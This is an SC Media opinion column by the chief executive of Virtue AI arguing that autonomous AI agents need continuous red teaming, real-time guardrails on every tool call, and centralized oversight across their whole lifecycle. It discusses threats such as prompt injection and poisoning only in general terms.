COMMENTARY: For decades, cybersecurity has rested on one assumption. Software behaves predictably. We define inputs, control execution paths, monitor outputs. Then we manage firewalls, endpoint detection, and access control lists. All of it depends on that predictability.
AI systems do not fail like traditional software. They are often poisoned during training, manipulated at runtime through prompt injection or jailbreaks, or quietly corrupted by unsafe environments. Without an adaptive, AI-native security approach, risk outpaces static controls, resulting in AI drift, unsafe outputs, and failures that appear only after harm takes place.
[
SC Media Perspectives columns are written by a trusted community of SC Media cybersecurity subject matter experts. Read more Perspectives here.]
Agents further complicate this risk landscape. They execute code, call APIs, browse the web, and touch enterprises' most sensitive systems. One agent handling a routine workflow can hit a CRM, spin up a code execution sandbox, and pull from an external data source in seconds. It picks its own tools. It reasons about what to do next. No static security rule accounted for that. The risk surface is not just bigger than before. It’s a different entity entirely: dynamic, context-dependent, expanding with every new integration.
Point controls were built for a world that no longer exists
The instinct in most security organizations has been to reach for familiar tools. Scan the prompt. Harden the model. Monitor the API call. Unfortunately, traditional security tools leave organizations blind to how agents actually operate end-to-end. Evaluating actions in isolation leads to false positives, missed multi-step attacks, and limited visibility into why decisions were blocked.
An agent doesn't just receive an instruction and return a result. It reasons, selects tools, interacts with live environments, adapts to what it finds, and produces effects that compound across systems. Scanning a single prompt tells us nothing about what the agent decides to do three steps later when it hits an unexpected database schema. Watching one API call misses the chain of 10 that follows.
When an agent can move between a customer database, a code interpreter, and an external web service inside a single task, perimeter defenses cannot keep up. We have to secure the full lifecycle.
One-Time assessments create a false sense of security
Too many teams treat agent security as a "test once, deploy forever" scenario. An agent that passes every safety benchmark in staging can behave very differently once it's connected to live databases, unfamiliar third-party servers, or other agents in production.
A one-time assessment captures risk at a single point in time. It says nothing about next week, after the integrations shift or the operating environment changes. No mention that the agents can evolve themselves currently with effective skills.
New vulnerabilities surface constantly. Prompt injections. Tool-level exploits. Environment-based attacks. These demand continuous detection and response. Not a snapshot.
We need to make continuous red teaming, spanning hundreds of attack strategies across categories like prompt injection, tool manipulation, and environment exploitation the new standard. Anything less leaves organizations exposed to risks that didn't exist on the day they ran their last assessment.
Only real-time defense counts
With autonomous agents, the damage lives in the gap between detection and response. By the time a log entry flags an unauthorized data transfer or a runaway sequence of API calls, the consequences may have already hit: Data exposed. Transactions executed. Trust broken.
Enterprises need real-time, stateful guardrails for every agent action. Every tool call evaluated before execution. Insecure or out-of-policy behavior flagged before impact. Stealthy multi-step attacks detected through context-aware analysis.
Security must sit at a centralized enforcement point between agents and everything they touch, with full observability into conversations, tool calls, decision trajectories, and token traces.
It's not an option to move from reactive monitoring to proactive control. It’s the defining requirement of securing autonomous AI at enterprise scale.
Enterprises cannot treat agent security as a point solution or a one-time control. They need the ability to test, monitor, and control agents throughout their entire lifecycle. Pre-deployment red teaming. Continuous MCP analysis. Real-time enforcement and governance in production. Security must follow the agent wherever it operates.
That requires visibility, traceability, and accountability for every agentic framework. Visibility into conversations, actions, tool calls, and decision trajectories. Traceability across every step of reasoning and execution. Accountability enforced through centralized governance, role-based access control, and audit-ready records.
Autonomous systems demand continuous oversight. Enterprises that embed lifecycle security into their agent architecture will reduce risk. They will also move faster, deploy with confidence, and maintain control as AI becomes core to their operations.
Bo Li, chief executive officer, Virtue AISC Media Perspectives columns are written by a trusted community of SC Media cybersecurity subject matter experts. Each contribution has a goal of bringing a unique voice to important cybersecurity topics. Content strives to be of the highest quality, objective and non-commercial.
